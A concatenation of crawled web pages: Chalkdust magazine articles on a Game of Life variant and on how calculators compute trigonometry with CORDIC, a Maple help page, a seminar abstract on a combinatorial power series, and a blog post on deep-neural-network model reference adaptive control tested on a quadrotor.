http://chalkdustmagazine.com/category/front-page-banner/
# Reproduce or die

It was about 1975 when I first heard of John Conway’s Game of life, a cellular automaton that is able to mimic aspects of living organisms, such as moving, reproducing and dying. Some school friends who had joined the computer club awoke my curiosity and even though I didn’t know the exact rules at the time, I made up my own version and called it: Reproduce or die 2/4. Let me explain.

John Conway’s version takes place in an infinite 2D checkerboard universe where time goes by in discrete steps. Each square or ‘cell’ in his universe has two possible states, either alive or dead. An initial configuration of living cells is created and the state of any cell at the next time step depends on how many living neighbouring cells it has at the current moment. Conway included all eight neighbouring cells surrounding the one being considered (see the green cell in the figure below), called the Moore neighbourhood. There are four cells touching its sides (labelled s in the figure): north, south, east and west, and four neighbouring cells touching corners (labelled c) with the cell in question: NE, NW, SE and SW. If a cell has just two living neighbours, it will stay alive or stay dead. If it has three living neighbours, it will stay alive or come alive. Any other total and it will die or stay dead. For more about Conway’s version, check out this link.

Neighbouring cells.

In my checkerboard 2D universe, I only consider the 4 side cells that surround a living cell, i.e. the ones north, south, east and west (the cells marked ‘s’ above), known as the Von Neumann neighbourhood. I ignore the corner cells (marked ‘c’). The rules are simple:

• If a living cell has exactly two living side neighbours in the present time step (or generation as I call it), then two new daughter cells are born into the two empty side cells (i.e. they come alive) and the parent stays alive in the next generation.
• Every other cell dies or stays dead in the next generation.

As the only cells that survive are ones that have two out of four possible living neighbours and they also reproduce (all others dying), I call my version Reproduce or Die 2/4. At first I worked out the new generations by hand on graph paper, but when home computers became a reality in the early 1980’s, I wrote my own programs.

## Applying the rules

Consider three living cells in a row (below left, shown in green) in the first generation. The end ones have only one neighbour each so they will die. The middle cell has two neighbours so will live and at the same time will produce two offspring, one in each of the empty neighbouring cells (marked ‘0’), one above and one below (see middle figure below). A new shape is created, which is also a line of three living cells but this time vertical. In the next generation, only the middle cell will survive and will create two daughter cells, one to the left and one to the right. The ‘organism’ returns to its original shape (below right) and then repeats the cycle continuously. It is an oscillator of period 2. I call it the rod.

The evolution of the ‘rod’, from left to right.

Consider now a set of three living cells that make a small corner (below left). The end cells each have only one neighbour (the corner cell itself) so will die, but the middle cell that makes the corner has two neighbours so will live and give birth to two daughter cells, one in each of the two unoccupied side cells. The new shape is still a corner, but pointing the other way.
In the next generation, the end cells will die and the middle cell will reproduce offspring into the two empty side cells and voilà, we get the same starting shape again. This too is an oscillator of period two. I call this shape the corner. Every birth that is possible in this universe is built up of just these two: the rod and the corner.

The evolution of the ‘corner’, from left to right.

For simplicity, the chosen universe for the remainder of this article has a finite size (20×20 cells) but has periodic boundary conditions, like some video games. This means that the top of the spreadsheet is connected to the bottom and the right side is connected to the left side, so the universe is like the surface of a torus. Let us now see what kind of creatures can inhabit this cosmic doughnut when we start combining more than three living cells next to each other.

## Shakers and movers

Five oscillators of period two. Clockwise from top: corner, rod, H, and the small and large butterflies. The grid on the right shows the second generation of each oscillator.

The Reproduce or die 2/4 universe cannot be static, due to the chosen rules, and in its simplest state it has to at least oscillate, so let us have a look at a few of the ‘shakers’ that live here. Five oscillators are shown above. The ‘corner’ and ‘rod’ have already been introduced. Each has a period of two and both are among the most common shapes to turn up in random initial conditions, i.e. those where the initial state of each cell is chosen at random. The H also has a period of two. The ‘large and small butterflies’ shown above also have periods of two and seem quite rare, but have appeared as end products of a symmetric explosion (see later).

A good game of life would be boring if it didn’t have any mobile creatures, so fortunately this universe has a fair share of travelling folk. Four examples are shown below. In this case all move north:

Gliders that move north. Four time-steps are shown, going clockwise from top left. The gliders are called (clockwise from bottom left in the first time-step) the small C, the hat, the short leg, and the leg1.2.3.2.

The first glider (bottom left) I call the small C. It evolves over three generations before returning to its original shape, but it has moved one cell north during this period. It thus has a speed 1/3 that of light and a period of 3. (Note: speed of light is the name given to the maximum possible speed, which in this universe is one cell per time interval). The small C is very different to all the other gliders so far discovered, as will become clear. The next glider (above the C), I call the hat. It keeps the same shape every generation (so has a period of one) and moves at the speed of light: one cell per time step. It is the most common glider in this version of the Game of Life. The top right shape I call the short leg, which is like the hat but with one short limb. It has a period of two and moves at the speed of light. The final example (bottom right shape) is the leg1.2.3.2. This one has a period of 4 before it returns to its initial shape and, like almost every glider, it moves at the speed of light. As with John Conway’s Game of Life, this version also has shapes that create strings of gliders (guns as they are called), plus there are many interesting collisions involving moving shapes, but time and space are limited so let us move onto one of the more spectacular performances in the presentation.
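Since the 2/4 rules are completely specified above, one generation of the update is only a few lines of code. The following is a minimal illustrative sketch (my own, not Dmitry's interactive program mentioned later in the article); it assumes the 20×20 toroidal universe used in the article.

```python
# One generation of "Reproduce or die 2/4" on a toroidal grid:
# a live cell with exactly two live von Neumann (side) neighbours
# survives and fills its empty side cells; every other cell dies
# or stays dead.
import numpy as np

SIDES = [(0, 1), (0, -1), (1, 1), (1, -1)]  # (axis, shift) for N, S, E, W

def step(grid):
    # Count live side-neighbours, wrapping around the edges (torus).
    n = sum(np.roll(grid, s, axis=a) for a, s in SIDES)
    # "Parents": live cells with exactly two live side-neighbours.
    parents = (grid == 1) & (n == 2)
    # Daughters are born only into currently empty side cells of a parent.
    near_parent = np.zeros_like(grid, dtype=bool)
    for a, s in SIDES:
        near_parent |= np.roll(parents, s, axis=a)
    births = (grid == 0) & near_parent
    return (parents | births).astype(np.uint8)

# The 'rod': three live cells in a row oscillates with period 2.
g = np.zeros((20, 20), dtype=np.uint8)
g[10, 9:12] = 1
assert np.array_equal(step(step(g)), g)
```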
## The big bang

There is a category of simple regular shapes that grow like an explosion and maintain their symmetry through each ensuing generation. I call the simplest one, starting with a 2×2 array of living cells, the ‘big bang’. A selection of stages of this explosion is shown below. Each generation might make a unique repeating floor tile, or possibly, one of the most challenging crossword layouts ever!

The big bang on the 1st, 11th, 21st, 41st, 81st and 136th generation.

In an infinite universe, all such shapes would grow indefinitely, but as it is finite here, the advancing ‘shock waves’ of the exploding shapes meet each other at the edges and then interfere. The big bang eventually settles down to a simple oscillating pattern of 12 corners on the 136th generation, much like the formation of the galaxies (or stars) in our own universe. All other symmetrical patterns settle down, but some with a long dance, needing up to seven generations in the end repeating cycle.

## A random field

A random initial field.

A random field is one where the initial state of the cells, alive or dead, is decided by a probability rating $p$, e.g. $p = 0.5$ would mean the chance of a cell starting alive would be 50%, hence about 50% of the cells would be alive using a random number function at the start. Most random, asymmetric shapes produce what seems to be permanent disorder that expands and fills the space and looks like it never wants to settle down. As this particular universe is finite in size, there are a finite number of possible states, so in fact all configurations will repeat, even if they take a long time. To the right is a typical example of such a random population many generations after its creation. In this example one can see, top right, an oscillating corner, while near the centre is a hat glider, moving downwards. Neither shape will survive more than a generation or two, but this is how precarious life is in this universe.

## Conclusion

The Reproduce or die 2/4 variation does have its moments of oscillators, gliders, guns, collisions and explosions, with some amazing kaleidoscopic patterns to delight the eyes. The downside is that there are far too many uncontrolled population growths that swamp and destroy the more interesting order. Life in such volatile fields is short-lived and fleeting, much like the real universe. Perhaps that is what makes this kind of life so precious.

## Whatever next?!

In Reproduce or die 2/4, there are a few questions I would like to ask:

• How would changing the finite size of the universe change the outcomes? I used a 20×20 universe, but I’d expect it to be different for, say, a 30×30. Readers will have a chance to try this out!
• In a random field, is there a pattern to the population density?
• What is the frequency of appearance of stable shapes, like the hat, corner and rod?
• What would happen if the Reproduce or die 2/4 rules were modified slightly? For example, when two cells are trying to be born into the same square, what if they cancelled out and it remained empty? That might dampen down those unwanted exponential explosions.

I asked one of my physics students, Dmitry Mikhailov, to create the Reproduce or Die world so readers could play with it themselves. He kindly took up the challenge and has made an interactive version here. All images in this article are also thanks to his program and Dmitry’s contribution is much appreciated. Please share your discoveries of any interesting new shapes.
Remember, stable shapes are hard to find as most situations end in disarray, so don’t be put off (unless you like entropy!). Finally, why not consider trying to create your own set of rules and you can then be the god (or goddess) of your own universe!

# How do calculators do trigonometry?

## How your calculator DOESN’T do it

The easiest and least accurate way to calculate sine and cosine for an angle is to measure a physical object. Want to know $\sin(40^\circ)$? Then get out your protractor, draw a right-angled triangle with a $40^\circ$ angle, and divide the measured length of the opposite side by the hypotenuse.

Finding $\sin(40^\circ) \approx$ 6cm/10cm through measurement

During the all-too-brief reign of the analogue calculator, you could effectively do this electro-mechanically by measuring the induction in a coil of wire angled $40^\circ$ out of phase with another coil — but unless your calculator was salvaged from the navigation computer of a 50s Boeing bomber aircraft, this is not how your calculator does it. Nor does your calculator consult tables of values painstakingly hand-derived from the angle addition and half-angle trigonometric identities, as was the norm for mathematicians, scientists, and engineers until the mid-century.

If you’re like me, you assumed that modern calculators approximate sine and cosine with polynomial functions using techniques from calculus and analysis. (If you’re very like me, you told a high school student this in your first year of teaching, struggling to make the key ideas of Taylor series accessible without referencing calculus.) However, these algebraic approximations prove slow to converge. A sophisticated computer can take a shortcut by storing the old immense tables in memory and then Chebyshev-approximating to get the last few digits of accuracy. But what about your pocket or scientific calculator, or, for that matter, your TI graphing calculator — where adding that architecture would be an expensive hassle?

## A weirdly capitalised acronym

Enter CORDIC, the COordinate Rotation DIgital Computer — an algorithm designed by Convair’s Jack Volder to exploit the strengths of the then-emerging digital computers to their fullest. The idea that Volder laid out in “Binary Computation Algorithms for Coordinate Rotation and Function Generation” is simple: Program the computer to be able to perform a set of progressively smaller rotations, which it can then apply on one of the points of a known right-angled triangle—say, the $45^\circ-45^\circ-90^\circ$ isosceles right triangle with hypotenuse $1$—until it reaches the angle, and thus the measurements, of the desired triangle.

Rotating a vertex to find $\sin(75^\circ) \approx 0.97\ldots/1$.

By itself, this eliminates the need to store an immense table—roughly speaking, each new smaller rotation refines the result to an additional binary digit of accuracy, and all that needs to be stored are the instructions for rotating by that angle. Indeed, similar methods were used for those hand-generated tables: the method described so far is a geometric perspective on using the angle-sum trigonometric identities. Volder’s algorithm, however, doesn’t stop there.
It adds in two crucial details that computers just adore:

• Don’t choose your set of rotations by progressively halving the angle—choose them by halving their tangents: $\tan(45^\circ)=1$, $\tan(26.56\ldots^\circ)=\frac{1}{2}$, $\tan(14.03\ldots^\circ)=\frac{1}{4}$…
• Instead of performing a true rotation, attach the side of a right triangle with the desired angle to the old hypotenuse, creating what Richard Parris calls a fan.

Building a fan to approximate a $40^\circ$ angle.

Both of these refinements to the scheme would seem to make our lives more difficult; after all, we lose both the nice rational angles and the hypotenuse that stays obligingly fixed at length 1. We shall see, however, that the actual computations are more straightforward, and are even simpler in binary arithmetic. If you are particularly fond of transformation matrices, you can pause your reading right now to work out why this is on your own (or read it in Richard Parris’ excellent “Elementary Functions and Calculators”)—but if you’d like to see a more purely geometric explanation, read on!

## CORDIC: A geometric justification

Let’s look at a simple example of these rules in action. Say we have a right-angled triangle with sides of length $a$, $b$, and $c$, following well-trod convention. Let $c$ be the hypotenuse, and let side $a$ be adjacent to an angle $\theta$:

A right-angled triangle.

We then attach to the hypotenuse a triangle with a tangent ratio of $\frac{1}{2}$—that is, such that the side opposite the angle $\varphi$ is half the length of the side next to it. This opposite side, then, has length $\frac{c}{2}$:

Attaching a triangle with a tangent ratio of $\frac{1}{2}$.

And what of the triangle we want—a right-angled triangle with angle $\theta+\varphi$? Consider a vertical drawn from the opposite angle of the new triangle, perpendicular to side $a$, and a horizontal from the opposite angle of the original triangle perpendicular to side $b$:

A triangle with angle $\theta + \varphi$.

We then have the marked congruent angles—so the right triangle created by the intersection of the vertical and the horizontal is similar to the original triangle, and indeed is simply a triangle half the size, rotated by $90^\circ$! Thus, the dimensions of a right triangle with angle $\theta+\varphi$ can be $a-\frac{b}{2}$ on the adjacent side, and $b+\frac{a}{2}$ on the opposite side:

The side-lengths of the triangle with angle $\theta + \varphi$.

Similarly, we find sides of $a+\frac{b}{2}$ and $b-\frac{a}{2}$ for the triangle with angle $\theta-\varphi$, and would find $b+\frac{a}{2^n}$ and $a-\frac{b}{2^n}$ if we had sought $\varphi$ with a tangent halved $n$ times. The change in the side lengths will always be given by that little triangle, which — as its sides are constructed parallel to those of the original triangle — will always be similar to the original triangle, with its scale determined by the tangent ratio of the new triangle in the fan.

## What your calculator (maybe) does

To build out the fan and track the coordinates of the point, we only need to repeat this little divide-and-add process until we get close enough to the desired angle. For a binary computer, this is easy. Dividing by two is a simple matter of moving the decimal over by one place; dividing by $2^n$, moving the decimal point over by $n$ places.
Many simpler calculators use binary-coded decimal instead of pure binary—storing each digit of a decimal number individually in binary representation—which adds some wrinkles, but follows fundamentally the same principle. All that remains is addition.

For calculation of the sine and cosine ratios, we need only one further piece of information: the length of the hypotenuse. Here the “fan” is helpful, especially if we make one further proviso—we never leave an angle, or triangle, out. Then the component triangles of the fan are fixed, and in return for losing a bit of speed in narrowing in on the correct angle, we can have the computer memorise the length of the hypotenuse of the final, thinnest triangle in the fan—that same line will be the hypotenuse of the desired triangle!

Let us walk through this process, in binary, with the example of a four-step fan for $40^\circ$ illustrated above. We start with an isosceles right triangle with legs of length 1. This gives us our initial coordinates $\left(x_0,y_0\right)$ of $\left(1,1\right)$. We then subtract the half-tangent right triangle, about $26^\circ$ (below, a subscript “$d$” indicates the number is in base-10):

$x_1 = x_0+\frac{y_0}{2_d^{1_d}} = 1+\frac{1}{2_d} = 1+0.1=1.1$
$y_1 = y_0-\frac{x_0}{2_d^{1_d}} = 1-\frac{1}{2_d} = 1-0.1 = 0.1$

Then we add the quarter-tangent triangle, about $14^\circ$:

$x_2 = x_1-\frac{y_1}{2_d^{2_d}} =1.1-\frac{0.1}{4_d}= 1.1-0.001=1.011$
$y_2 = y_1+\frac{x_1}{2_d^{2_d}} =0.1+\frac{1.1}{4_d} = 0.1+0.011 = 0.111$

And finally, we add the eighth-tangent triangle, or about $7^\circ$, to arrive at an angle of $39.6^\circ$:

$x_3 = x_2-\frac{y_2}{2_d^{3_d}} =1.011-\frac{0.111}{8_d}= 1.011-0.000111=1.010001$
$y_3 = y_2+\frac{x_2}{2_d^{3_d}} =0.111+\frac{1.011}{8_d} = 0.111+0.001011 = 1.000011$

Transitioning back into decimal, this gives us an $x$-coordinate of about 1.27 and a $y$-coordinate of about 1.047. Repeated application of the Pythagorean theorem, meanwhile, tells us that the length of the hypotenuse of the eighth-tangent triangle—shared by the hypotenuse of the combined $39.6^\circ$ triangle—is about 1.64. So, $\sin(40^\circ)\approx \frac{1.047}{1.64} = 0.638$. This is pretty close to the actual three-place value of 0.643—but it should be noted that $40^\circ$ is one of the more convenient angles to reach in this fashion. A more usual implementation of CORDIC would be set to halve the tangent twenty or thirty times to ensure accuracy past five decimal places.

So, we can calculate sine and cosine with only one computationally costly task: dividing by a set number at the end. Those computational costs, though, have been decreasing, and CORDIC’s clever algorithmic thriftiness has begun to fall from favour. Intel’s CPUs haven’t used CORDIC since the days of the 486, and even some modern graphing calculators have dropped the method in favour of the polynomial approach. But even though CORDIC may someday cease to be a tool people use themselves, its incredible simplicity, cheap implementation, and proven accuracy will keep it in use in dedicated processors and purpose-built machines for as long as speciality electronics needs to know how to measure triangles.
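To make the procedure concrete, here is a compact Python sketch of the fan-building scheme described above (an illustration of the idea, not any real calculator's firmware; the function name and the choice of 30 steps are my own).

```python
# CORDIC-style sine/cosine: rotate by tangent-halving angles until
# the running angle reaches the target, then divide by the known
# hypotenuse of the full fan at the very end.
import math

def cordic_sin_cos(angle_deg, steps=30):
    # Fan angles: arctan(1), arctan(1/2), arctan(1/4), ...
    fan = [math.degrees(math.atan(2.0 ** -i)) for i in range(steps)]
    # Hypotenuse length after using every triangle in the fan once.
    hyp = math.prod(math.sqrt(1 + 4.0 ** -i) for i in range(steps))
    x, y, current = 1.0, 0.0, 0.0
    for i, phi in enumerate(fan):
        if current < angle_deg:                 # rotate anticlockwise
            x, y, current = x - y / 2**i, y + x / 2**i, current + phi
        else:                                   # rotate clockwise
            x, y, current = x + y / 2**i, y - x / 2**i, current - phi
    return y / hyp, x / hyp                     # (sin, cos)

s, c = cordic_sin_cos(40.0)
print(round(s, 5), round(c, 5))                 # ~0.64279 ~0.76604
```

Note that the loop never skips a rotation; this is what keeps the final hypotenuse a fixed, precomputable constant, exactly the proviso discussed above.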
## An exercise for the reader

As the hyperbolic trigonometric functions share many basic properties with their circle-trigonometric counterparts, it may come as little surprise that CORDIC can also evaluate $\sinh$, $\cosh$, $\tanh$, and the rest of the hyperbolic ratios — though values on the hyperbola can shift fast enough to leave ‘gaps’ that hyperbolic-tangent–halving alone can’t reach. Curiously, though, the fact that $\cosh(x)+\sinh(x)=e^x$ means that the basic CORDIC method can even be adapted to evaluate exponents and logarithms. If you can describe a geometric justification for the hyperbolic, exponential, or logarithmic variants like the circular case above, please let me know — I’m tired of looking at matrices.

# Counting all the numbers between zero and one

Heavy as the setting sun
Oh, I’m counting all the numbers between zero and one
Happy, but a little lost
Well, I don’t know what I don’t know so I’ll kick my shoes off and run
Sir Sly, &Run

There’s a song popular on the radio right now (‘&Run’ by Sir Sly) that contains the lyric, “I’m counting all the numbers between zero and one.” The first time I heard it, I thought, that’s not going to take very long. I assumed the singer was referring to integers, of which there are none strictly between zero and one. Was he trying to tell the woman he was singing to that he was impatient to see her again? Or suggesting that they were as close as two adjacent integers, with literally nothing keeping them apart?

The second time I heard the song, though, it occurred to me that he might be referring to the real numbers, of which there are an infinite number between zero and one. Counting those would keep him busy for, well, ever. Was he expressing his (infinite) patience? Or was he in despair at an impossible task? It all depends on what Sir Sly means by ‘numbers.’ (Also ‘counting’, and even ‘between’.)

# Unknown pleasures: pulsars and the first data revolution

Many of the 20th century’s most famous albums are as celebrated for their artwork as they are for their music. This is particularly true of albums from the 1970’s: think of Bowie’s Aladdin Sane, Fleetwood Mac’s Rumours, or Pink Floyd’s Dark side of the moon. The 1970’s were a golden era for concept albums in popular music, meaning that the world’s biggest artists spent a lot of time and money producing beautiful covers to fit the sound and message of the songs within.

A recurring theme in artistic images from that decade is space. In the age of the moon landing, when much of technological development was focused on pushing the human frontier, cosmic images were everywhere in popular culture. The original Star Trek series was first broadcast in 1966, the first Star Wars film was released in 1977, and E.T. followed five years later. Similarly, Parliament’s Mothership connection (1975) and Supertramp’s Crime of the century (1974) both feature space-inspired covers. With space comes science, so it’s no surprise that many of the most famous album covers have an interesting scientific tale to tell. One spacey image with a particularly rich backstory comes from Joy Division’s 1979 debut, Unknown pleasures. The cover of the album features an array of wavy, organic-looking lines on a black background, with no information suggesting where they might come from. (Neither the title of the album nor the name of the artist appears on the front cover.)
In fact the image is a ‘stacked plot’ depicting radiation emitted by a pulsar, a type of star that had been discovered 12 years earlier, and gives a glimpse into the transformative effect that early computers had on scientific research.

The cover of Unknown pleasures.

# Talkdust, episode 4

It’s time for episode four of Talkdust! You can listen to the podcast using the player below, or download an mp3, or search for us in your favourite podcast app (or add us to your app manually using the RSS feed). The presenters of this episode of Talkdust are Sean Jamshidi and Eleanor Doman. Music and editing by Matthew Scroggs, and announcements by Tom Rivlin. In this episode:

• Eleanor and Sean talk about the launch of issue 09.
• Eleanor and Sean talk some more about the launch of issue 09.
• Eleanor and Sean play a game in which they try to describe mathematical words to each other and take the second place position on the leaderboard.

# The scutoid: a geometric building block of life

It is not uncommon for a juicy piece of mathematics to crop up in a seemingly unexpected place — such as in the building blocks of multicellular life: epithelial cells. In June 2018 it was in the realms of cellular biology that a new geometric solid, previously unknown to mathematicians, was discovered. Behold, the scutoid!

Our latest edition, Issue 09, is available now. Enjoy the articles online or scroll down to view the magazine as a PDF.

## Features

### When Truchet met Chladni
Stephen Muirhead meets neither, as he explores waves, tiles and percolation theory

### Playing billiards with cue-bics
Yuliya Nesterova misses all the pockets, but does manage to solve some cubics

### Hiding in plain sight
Axel Kerbec gets locked out while exchanging keys

### In conversation with Matt Parker
Interviewing Matt was a mistake

### Oπnions: Can a horse have an Erdős number?
Lucy Rycroft-Smith reflects on the use of this well-established measurement

### On the cover: Harriss spiral
Find out more about the spiral trees on the cover of Issue 09

### Bells, braids and taxicabs
An adventure that starts with a morning of bell ringing and ends with a mad dash in a taxi

### Counting caterpillars
Peter Rowlett uses combinatorics to generate caterpillars

### Striking the right chord
How big are these random shapes? Submit an answer for a chance to win a prize!

## Fun

### Prize crossnumber, Issue 09
Win £100 of Maths Gear goodies by solving our famously fiendish crossnumber

### Dear Dirichlet, Issue 09
Coffee, Brexit and badgers are among the topics of discussion in this issue's Dear Dirichlet advice column

### Horoscope, Issue 09
Mystic mug has some predictions for you...

### Top Ten: Chalkdust regulars
The definitive chart of the best Chalkdust regulars

Your guide to creating the optimal homepage

### What’s hot and what’s not, Issue 09
Fashion is fleeting, Chalkdust regulars are not.

### Which symbol are you?
Are you u or i? Am I? Who?

### Top ten vote issue 09
Vote for your favourite Chalkdust issue

### Page 3 model: Game of Thrones
Using graph theory to predict who will sit the iron throne or
2019-09-19 12:29:42
{"extraction_info": {"found_math": true, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 0, "mathml": 0, "mathjax_tag": 0, "mathjax_inline_tex": 2, "mathjax_display_tex": 0, "mathjax_asciimath": 0, "img_math": 0, "codecogs_latex": 0, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 0, "wp-katex-eq": 0, "align": 0, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.4285747706890106, "perplexity": 1078.4216428738118}, "config": {"markdown_headings": true, "markdown_code": true, "boilerplate_config": {"ratio_threshold": 0.18, "absolute_threshold": 10, "end_threshold": 15, "enable": true}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2019-39/segments/1568514573519.72/warc/CC-MAIN-20190919122032-20190919144032-00014.warc.gz"}
https://jp.maplesoft.com/support/help/maple/view.aspx?path=type/radical
type/radical - Maple Programming Help

# type/radical
check for fractional powers

Calling Sequence
type(expr, radical)

Parameters
expr - expression

Description
• The definition of type radical is that expr is of type `^` and op(2, expr) (the exponent) is of type fraction.

Examples
> type(2^(1/2), radical)
true (1)
> type(y^(2/5), radical)
true (2)
> type(y^3, radical)
false (3)
> type(sqrt(x^2+y^2), radical)
true (4)
2021-03-05 23:48:06
{"extraction_info": {"found_math": true, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 0, "mathml": 8, "mathjax_tag": 0, "mathjax_inline_tex": 0, "mathjax_display_tex": 0, "mathjax_asciimath": 1, "img_math": 0, "codecogs_latex": 0, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 0, "wp-katex-eq": 0, "align": 0, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.9935576319694519, "perplexity": 9999.747754338756}, "config": {"markdown_headings": true, "markdown_code": true, "boilerplate_config": {"ratio_threshold": 0.18, "absolute_threshold": 10, "end_threshold": 15, "enable": false}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2021-10/segments/1614178373761.80/warc/CC-MAIN-20210305214044-20210306004044-00430.warc.gz"}
http://www.ms.unimelb.edu.au/research/seminars.php?id=915
# Some wonderful conjectures (but almost no theorems) at the boundary between analysis, combinatorics and probability

#### by Alan Sokal

Institution: University College London/New York University
Date: Thu 29th July 2010
Time: 10:00 AM
Location: Old Geology Theatre 1, The University of Melbourne

Abstract: I discuss some analytic and combinatorial properties of the entire function $F(x,y) = \sum\limits_{n=0}^\infty \frac{x^n}{n!} y^{n(n-1)/2}$. This function (or formal power series) arises in numerous problems in enumerative combinatorics, notably in the enumeration of connected graphs.
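As a quick illustration of the series (my own snippet, not part of the seminar abstract), the partial sums are easy to evaluate numerically; at y = 1 the function reduces to e^x, which gives a simple check.

```python
# Partial sums of F(x, y) = sum_{n>=0} x^n/n! * y^(n(n-1)/2).
from math import factorial

def F(x, y, terms=60):
    return sum(x**n / factorial(n) * y**(n * (n - 1) // 2)
               for n in range(terms))

print(F(1.0, 1.0))   # y = 1 recovers e^1 = 2.71828...
print(F(2.0, 0.5))   # a generic point of the (x, y) plane
```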
2017-10-17 06:04:01
{"extraction_info": {"found_math": true, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 0, "mathml": 0, "mathjax_tag": 0, "mathjax_inline_tex": 1, "mathjax_display_tex": 0, "mathjax_asciimath": 0, "img_math": 0, "codecogs_latex": 0, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 0, "wp-katex-eq": 0, "align": 0, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.6066895723342896, "perplexity": 4739.644798901495}, "config": {"markdown_headings": true, "markdown_code": true, "boilerplate_config": {"ratio_threshold": 0.18, "absolute_threshold": 10, "end_threshold": 5, "enable": true}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2017-43/segments/1508187820927.48/warc/CC-MAIN-20171017052945-20171017072945-00013.warc.gz"}
https://girishvjoshi.github.io/gj_blog/dmrac/update/2019/12/18/Deep-Model-Reference-Adaptive-Control.html
## Abstract:

We present a new neuroadaptive architecture: Deep Neural Network-based Model Reference Adaptive Control (DMRAC). Our architecture utilizes the power of deep neural network representations for modeling significant nonlinearities while marrying it with the boundedness guarantees that characterize MRAC based controllers. We demonstrate that DMRAC can subsume previously studied learning-based MRAC methods, such as concurrent learning and GP-MRAC. This makes DMRAC a highly powerful architecture for high-performance control of nonlinear systems with long-term learning properties.

Please refer to the post Model Reference Adaptive Control for the basics of MRAC.

## Introduction

One significant design choice in the MRAC architecture is the selection of the feature vector for the unstructured-uncertainty case. In the Model Reference Adaptive Control article, we showed empirically that the choice of the feature vector in the adaptive element directly affected the system's capability to approximate the uncertainties. Using the system state $$x(t)$$ as features resulted in a very poor estimate of the uncertainty and poor reference tracking, whereas RBF features need operating-domain knowledge for hyperparameter tuning. To alleviate this issue, Chowdhary et al. presented a Gaussian Process Model Reference Adaptive Controller. Gaussian Process (GP)-MRAC utilizes a GP as a model of the uncertainty. A GP is a Bayesian nonparametric adaptive element that can adapt both its weights and the structure of the model in response to the data. GP-MRAC has strong long-term learning properties as well as high control performance (refer to Gaussian Process Model Reference Adaptive Controller with Generative Network). However, GPs can be viewed as “shallow” machine learning models, and do not utilize the power of learning complex features through compositions as deep networks do. Hence, one wonders whether the power of deep learning could lead to even more powerful learning-based MRAC architectures than those utilizing GPs.

Deep Neural Networks (DNNs) have lately shown tremendous empirical performance in many applications, including fields such as computer vision, speech recognition, translation, natural language processing, robotics, autonomous driving, and many more. Unlike their counterparts, such as Gaussian Radial Basis Function networks, deep networks learn features by learning the weights of nonlinear compositions of weighted features arranged in a directed acyclic graph. It is now pretty clear that deep neural networks are outshining heuristic-based regression and classification algorithms as well as RBFNs, GPs, single-hidden-layer NNs, and other classical machine learning techniques. However, their utility in the context of control, and especially safety-critical control, which requires stability guarantees, has been an open question. This article presents a control architecture and flight test results of Deep Neural Network MRAC (DMRAC).
For the details of the DMRAC controller, including the algorithm for the online update of the DNN weights using a dual time-scale adaptation scheme, the stability guarantees, and the Uniform Ultimate Boundedness (UUB) of the entire DMRAC controller, refer to our paper Deep Model Reference Adaptive Control.

The DMRAC controller aims to make the unknown nonlinear dynamic system track a designed reference model, given as

\begin{align*} \dot{x}(t) &= f(x)+Bu(t) \\ \dot{x}_{rm}(t) &= A_{rm}x_{rm}(t)+B_{rm}r(t) \end{align*}

where $$x(t) \in \mathcal{D}_x \subset \mathbb{R}^n$$, $$u(t) \in \mathbb{R}^m$$ and $$f: \mathbb{R}^n \rightarrow \mathbb{R}^n$$ is Lipschitz. The control is designed to be of the form $$u(t) = -kx(t)+k_gr(t)-\nu_{ad}$$, where $$k, k_g$$ are designed to satisfy the matching conditions $$A_{rm} = A-Bk, B_{rm}=Bk_g$$.

DMRAC models the uncertainty as a deep neural network,

\begin{align*} \nu_{ad}(x) = W^T\phi_n(\theta_{n-1},\phi_{n-1}(\theta_{n-2},\phi_{n-2}(...)))) \end{align*}

We separate the network weights into outer-layer weights $$W$$ and inner-layer weights $$\theta_n$$. The inner-layer weights are updated using stochastic gradient descent over a replay buffer of previously collected data,

$$L(\boldsymbol{Z}, \boldsymbol{\theta}) = \frac{1}{M}\sum_{i=1}^M \ell(\boldsymbol{Z}_i, \boldsymbol{\theta})$$

$$\boldsymbol{\theta}_{k+1} = \boldsymbol{\theta}_k - \eta_k \nabla_{\boldsymbol{\theta}} L(\boldsymbol{Z}, \boldsymbol{\theta}_k)$$

where $$L(\boldsymbol{Z}, \boldsymbol{\theta})$$ is the empirical estimate of the $$\ell_2$$ cost function over the data and $$\eta_k$$ is the learning rate. The outer-layer weights of DMRAC are updated using the MRAC rule

\begin{align*} \dot{W} = -\Gamma\phi_n(x)e(t)^TPB \end{align*}

The full controller flow diagram and further details can be found in Deep Model Reference Adaptive Control.

## Flight Results

We used an off-the-shelf Parrot Mambo quadrotor to experiment with the DMRAC control architecture in the VICON facility at the University of Illinois CSL Illinois Robotics Lab.

### Cross Wind Disturbance

In this experiment the controller is tasked with tracking a circular trajectory under a crosswind. We attached a cloth underneath the quadrotor; under the crosswind, the flapping of this cloth introduced a nonlinear disturbance torque on the vehicle in addition to the sideways force from the crosswind itself. The controller's task is to track the trajectory under these crosswinds.

### Fault Tolerant Control

